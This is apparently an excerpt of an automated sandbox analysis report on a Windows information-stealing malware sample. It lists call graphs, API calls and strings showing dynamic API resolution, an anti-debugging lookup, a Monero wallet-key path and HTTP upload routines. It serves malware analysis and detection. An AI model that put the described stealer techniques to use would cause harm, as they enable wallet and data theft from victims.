15668 8751b6 15667->15668 15669 88a740 lstrcpy 15668->15669 15670 8751c9 15669->15670 15671 88a740 lstrcpy 15670->15671 15672 8751d6 15671->15672 15673 88a740 lstrcpy 15672->15673 15674 8751e3 15673->15674 15675 88a740 lstrcpy 15674->15675 15676 8751f0 15675->15676 15677 88a740 lstrcpy 15676->15677 15678 8751fd InternetOpenA StrCmpCA 15677->15678 15679 87522f 15678->15679 15680 8758c4 InternetCloseHandle 15679->15680 15681 888b60 3 API calls 15679->15681 15687 8758d9 ctype 15680->15687 15682 87524e 15681->15682 15683 88a920 3 API calls 15682->15683 15684 875261 15683->15684 15685 88a8a0 lstrcpy 15684->15685 15686 87526a 15685->15686 15688 88a9b0 4 API calls 15686->15688 15691 88a7a0 lstrcpy 15687->15691 15689 8752ab 15688->15689 15690 88a920 3 API calls 15689->15690 15692 8752b2 15690->15692 15696 875913 15691->15696 15693 88a9b0 4 API calls 15692->15693 15694 8752b9 15693->15694 15695 88a8a0 lstrcpy 15694->15695 15697 8752c2 15695->15697 15696->15645 15698 88a9b0 4 API calls 15697->15698 15699 875303 15698->15699 15700 88a920 3 API calls 15699->15700 15701 87530a 15700->15701 15702 88a8a0 lstrcpy 15701->15702 15703 875313 15702->15703 15704 875329 InternetConnectA 15703->15704 15704->15680 15705 875359 HttpOpenRequestA 15704->15705 15707 8758b7 InternetCloseHandle 15705->15707 15708 8753b7 15705->15708 15707->15680 15709 88a9b0 4 API calls 15708->15709 15710 8753cb 15709->15710 15711 88a8a0 lstrcpy 15710->15711 15712 8753d4 15711->15712 15713 88a920 3 API calls 15712->15713 15714 8753f2 15713->15714 15715 88a8a0 lstrcpy 15714->15715 15716 8753fb 15715->15716 15717 88a9b0 4 API calls 15716->15717 15718 87541a 15717->15718 15719 88a8a0 lstrcpy 15718->15719 15720 875423 15719->15720 15721 88a9b0 4 API calls 15720->15721 15722 875444 15721->15722 15723 88a8a0 lstrcpy 15722->15723 15724 87544d 15723->15724 15725 88a9b0 4 API calls 15724->15725 15726 87546e 15725->15726 15819 888ea9 15818->15819 15820 888ead CryptBinaryToStringA 15818->15820 15819->15664 15820->15819 15821 888ece GetProcessHeap RtlAllocateHeap 15820->15821 15821->15819 15822 888ef4 ctype 15821->15822 15823 888f05 CryptBinaryToStringA 15822->15823 15823->15819 16066 879880 15824->16066 15826 8798e1 15826->15113 15828 88a740 lstrcpy 15827->15828 15829 87fb16 15828->15829 16001 88a740 lstrcpy 16000->16001 16002 880266 16001->16002 16003 888de0 2 API calls 16002->16003 16004 88027b 16003->16004 16005 88a920 3 API calls 16004->16005 16006 88028b 16005->16006 16007 88a8a0 lstrcpy 16006->16007 16008 880294 16007->16008 16009 88a9b0 4 API calls 16008->16009 16010 8802b8 16009->16010 16067 87988e 16066->16067 16070 876fb0 16067->16070 16069 8798ad ctype 16069->15826 16073 876d40 16070->16073 16074 876d63 16073->16074 16088 876d59 16073->16088 16089 876530 16074->16089 16078 876dbe 16078->16088 16099 8769b0 16078->16099 16080 876e2a 16081 876ee6 VirtualFree 16080->16081 16083 876ef7 16080->16083 16080->16088 16081->16083 16082 876f41 16086 8889f0 2 API calls 16082->16086 16082->16088 16083->16082 16084 876f26 FreeLibrary 16083->16084 16085 876f38 16083->16085 16084->16083 16087 8889f0 2 API calls 16085->16087 16086->16088 16087->16082 16088->16069 16090 876542 16089->16090 16092 876549 16090->16092 16109 888a10 GetProcessHeap RtlAllocateHeap 16090->16109 16092->16088 16093 876660 16092->16093 16096 87668f VirtualAlloc 16093->16096 16095 876730 16097 876743 VirtualAlloc 16095->16097 16098 87673c 16095->16098 16096->16095 16096->16098 16097->16098 16098->16078 16100 8769c9 16099->16100 16105 8769d5 16099->16105 16101 876a09 LoadLibraryA 16100->16101 16100->16105 16102 876a32 16101->16102 16101->16105 16103 876ae0 16102->16103 16110 888a10 GetProcessHeap RtlAllocateHeap 16102->16110 16103->16105 16106 876ba8 GetProcAddress 16103->16106 16105->16080 16106->16103 16106->16105 16107 8889f0 2 API calls 16107->16103 16108 876a8b 16108->16105 16108->16107 16109->16092 16110->16108

                  Executed Functions

                  Function 00889860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 660 889860-889874 call 889750 663 88987a-889a8e call 889780 GetProcAddress * 21 660->663 664 889a93-889af2 LoadLibraryA * 5 660->664 663->664 666 889b0d-889b14 664->666 667 889af4-889b08 GetProcAddress 664->667 668 889b46-889b4d 666->668 669 889b16-889b41 GetProcAddress * 2 666->669 667->666 671 889b68-889b6f 668->671 672 889b4f-889b63 GetProcAddress 668->672 669->668 673 889b89-889b90 671->673 674 889b71-889b84 GetProcAddress 671->674 672->671 675 889bc1-889bc2 673->675 676 889b92-889bbc GetProcAddress * 2 673->676 674->673 676->675
                  APIs
                  • GetProcAddress.KERNEL32(75900000,015D0738), ref: 008898A1
                  • GetProcAddress.KERNEL32(75900000,015D0840), ref: 008898BA
                  • GetProcAddress.KERNEL32(75900000,015D05D0), ref: 008898D2
                  • GetProcAddress.KERNEL32(75900000,015D05E8), ref: 008898EA
                  • GetProcAddress.KERNEL32(75900000,015D0618), ref: 00889903
                  • GetProcAddress.KERNEL32(75900000,015D8940), ref: 0088991B
                  • GetProcAddress.KERNEL32(75900000,015C6920), ref: 00889933
                  • GetProcAddress.KERNEL32(75900000,015C69A0), ref: 0088994C
                  • GetProcAddress.KERNEL32(75900000,015D0660), ref: 00889964
                  • GetProcAddress.KERNEL32(75900000,015D06A8), ref: 0088997C
                  • GetProcAddress.KERNEL32(75900000,015D0558), ref: 00889995
                  • GetProcAddress.KERNEL32(75900000,015D06C0), ref: 008899AD
                  • GetProcAddress.KERNEL32(75900000,015C6700), ref: 008899C5
                  • GetProcAddress.KERNEL32(75900000,015D0708), ref: 008899DE
                  • GetProcAddress.KERNEL32(75900000,015D0750), ref: 008899F6
                  • GetProcAddress.KERNEL32(75900000,015C6680), ref: 00889A0E
                  • GetProcAddress.KERNEL32(75900000,015D0768), ref: 00889A27
                  • GetProcAddress.KERNEL32(75900000,015D0870), ref: 00889A3F
                  • GetProcAddress.KERNEL32(75900000,015C69C0), ref: 00889A57
                  • GetProcAddress.KERNEL32(75900000,015D0918), ref: 00889A70
                  • GetProcAddress.KERNEL32(75900000,015C6880), ref: 00889A88
                  • LoadLibraryA.KERNEL32(015D0858,?,00886A00), ref: 00889A9A
                  • LoadLibraryA.KERNEL32(015D08D0,?,00886A00), ref: 00889AAB
                  • LoadLibraryA.KERNEL32(015D08B8,?,00886A00), ref: 00889ABD
                  • LoadLibraryA.KERNEL32(015D0888,?,00886A00), ref: 00889ACF
                  • LoadLibraryA.KERNEL32(015D08A0,?,00886A00), ref: 00889AE0
                  • GetProcAddress.KERNEL32(75070000,015D08E8), ref: 00889B02
                  • GetProcAddress.KERNEL32(75FD0000,015D0900), ref: 00889B23
                  • GetProcAddress.KERNEL32(75FD0000,015D8CE8), ref: 00889B3B
                  • GetProcAddress.KERNEL32(75A50000,015D8C10), ref: 00889B5D
                  • GetProcAddress.KERNEL32(74E50000,015C69E0), ref: 00889B7E
                  • GetProcAddress.KERNEL32(76E80000,015D8980), ref: 00889B9F
                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00889BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00889BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: 2ea74473eb56e6488753559d7e06573393f136e19887540fbcd641cd4dc16419
                  • Instruction ID: 5e5194eda6b0b585ff6b3cdbfecafb068813c244780c30b005f66c1f0fc4971f
                  • Opcode Fuzzy Hash: 2ea74473eb56e6488753559d7e06573393f136e19887540fbcd641cd4dc16419
                  • Instruction Fuzzy Hash: 93A14EB6604240AFD354EFE8FD8896637F9F76C301B54471AE605C3676DA3A9483CB12
                  Function 008745C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 764 8745c0-874695 RtlAllocateHeap 781 8746a0-8746a6 764->781 782 87474f-8747a9 VirtualProtect 781->782 783 8746ac-87474a 781->783 783->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0087460F
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0087479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874683
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0087466D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0087471E
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874622
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874734
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008746B7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874713
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0087462D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874617
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008745F3
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008746CD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0087475A
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874643
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874765
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874678
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008746C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008745D2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0087474F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008745C7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008746AC
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008746D8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0087477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874638
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008745DD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874729
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0087473F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874657
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874662
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008745E8
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 6a44b80b4f9054a62780004527e23231f8974511fd930edba4e7aff4fce9272f
                  • Instruction ID: fedf854bc0976856d3ca049c177c4b6d32138cc98af4d0f3a50937e2e37712cc
                  • Opcode Fuzzy Hash: 6a44b80b4f9054a62780004527e23231f8974511fd930edba4e7aff4fce9272f
                  • Instruction Fuzzy Hash: FC4106607C6784EACE2DB7A4884ED9D7B56FF42744F546088AC36A2780CBB46E82C715
                  Function 00874880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 801 874880-874942 call 88a7a0 call 8747b0 call 88a740 * 5 InternetOpenA StrCmpCA 816 874944 801->816 817 87494b-87494f 801->817 816->817 818 874955-874acd call 888b60 call 88a920 call 88a8a0 call 88a800 * 2 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a920 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a920 call 88a8a0 call 88a800 * 2 InternetConnectA 817->818 819 874ecb-874ef3 InternetCloseHandle call 88aad0 call 879ac0 817->819 818->819 905 874ad3-874ad7 818->905 829 874ef5-874f2d call 88a820 call 88a9b0 call 88a8a0 call 88a800 819->829 830 874f32-874fa2 call 888990 * 2 call 88a7a0 call 88a800 * 8 819->830 829->830 906 874ae5 905->906 907 874ad9-874ae3 905->907 908 874aef-874b22 HttpOpenRequestA 906->908 907->908 909 874ebe-874ec5 InternetCloseHandle 908->909 910 874b28-874e28 call 88a9b0 call 88a8a0 call 88a800 call 88a920 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a920 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a920 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a920 call 88a8a0 call 88a800 call 88a740 call 88a920 * 2 call 88a8a0 call 88a800 * 2 call 88aad0 lstrlen call 88aad0 * 2 lstrlen call 88aad0 HttpSendRequestA 908->910 909->819 1021 874e32-874e5c InternetReadFile 910->1021 1022 874e67-874eb9 InternetCloseHandle call 88a800 1021->1022 1023 874e5e-874e65 1021->1023 1022->909 1023->1022 1024 874e69-874ea7 call 88a9b0 call 88a8a0 call 88a800 1023->1024 1024->1021
                  APIs
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 008747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00874839
                    • Part of subcall function 008747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00874849
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00874915
                  • StrCmpCA.SHLWAPI(?,015DE4A0), ref: 0087493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00874ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00890DDB,00000000,?,?,00000000,?,",00000000,?,015DE480), ref: 00874DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00874E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00874E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00874E49
                  • InternetCloseHandle.WININET(00000000), ref: 00874EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00874EC5
                  • HttpOpenRequestA.WININET(00000000,015DE530,?,015DDD58,00000000,00000000,00400100,00000000), ref: 00874B15
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                  • InternetCloseHandle.WININET(00000000), ref: 00874ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: 8aebdeafc9a710ef3c9ef02d958d538e1fd66e156c92de79139917ca22700e6f
                  • Instruction ID: 09b83be20466bbf8002e563bf4d2cc626db68f731fc69775857941e3ef92df17
                  • Opcode Fuzzy Hash: 8aebdeafc9a710ef3c9ef02d958d538e1fd66e156c92de79139917ca22700e6f
                  • Instruction Fuzzy Hash: 6712DB71910118AAEB19FB94DD92FEEB738FF14300F5041AAB116A24D1DF742B4ACB63
                  Function 008878E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00887910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00887917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0088792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
